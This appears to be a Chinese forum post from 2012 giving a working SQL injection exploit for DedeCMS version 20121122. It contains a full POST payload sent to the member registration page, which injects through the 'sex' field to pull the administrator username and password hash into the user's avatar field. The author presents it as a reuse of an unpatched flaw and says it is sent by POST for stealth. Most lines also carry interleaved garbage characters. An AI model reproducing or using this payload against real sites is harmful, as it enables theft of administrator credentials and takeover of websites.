dedecms版本 20121122, P# x$ j. h" A: R" r0 F) \! n' P
2 o) t4 [" R, Z1 ^6 ]% N5 F" v9 ~
需要magic_quotes_gpc=Off1 ]5 P9 _8 Y, t( M6 {7 o& }
2 h+ [7 [( i5 l- ^- B9 F- S4 l
应该是没有什么大危害的漏洞.
0 _1 H: U* I( O1 ]" Q' d原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码./ T( I! W9 m. S" [
" o3 k6 G7 g. v: S) x是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
' s: |( \& T, a; J' O$ H$ I9 P0 t: FPOST提交以下数据,其实不用POST提交的,这样隐蔽点., { O7 v* N3 o1 E
) O/ T; D1 i) ]9 ~+ ghttp:///de/member/reg_new.php5 b& f7 ?& e; ]) a$ u
2 t v3 P5 h' n2 M+ c
POST
% j/ E5 A) i0 V
' M7 a; ^) q6 e! p; h! f+ _dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=$ s/ a& ~; }, l/ a& }
( v8 T* w- F, N* W6 Q5 U* [成功注册后,头像处里面有好玩的信息." s$ [; Z: s8 y1 K
+ V3 Y% d7 k/ ]
|
发表于 2012-12-5 10:03:32
收藏
支持
反对